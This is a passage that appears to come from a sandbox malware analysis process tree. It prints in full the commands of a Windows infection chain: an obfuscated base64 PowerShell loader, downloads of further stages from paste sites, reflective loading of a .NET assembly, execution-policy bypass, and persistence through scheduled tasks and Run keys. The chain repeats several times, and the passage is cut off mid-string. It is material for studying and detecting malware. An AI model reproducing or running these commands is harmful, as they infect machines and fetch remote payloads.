'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        
        PID:5440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:5700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5812
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5636
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:3724
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2508
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1168
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4868
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        
        PID:5920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:4492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:2420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:5740
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:6096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5700
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5656
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5492
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:436
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★B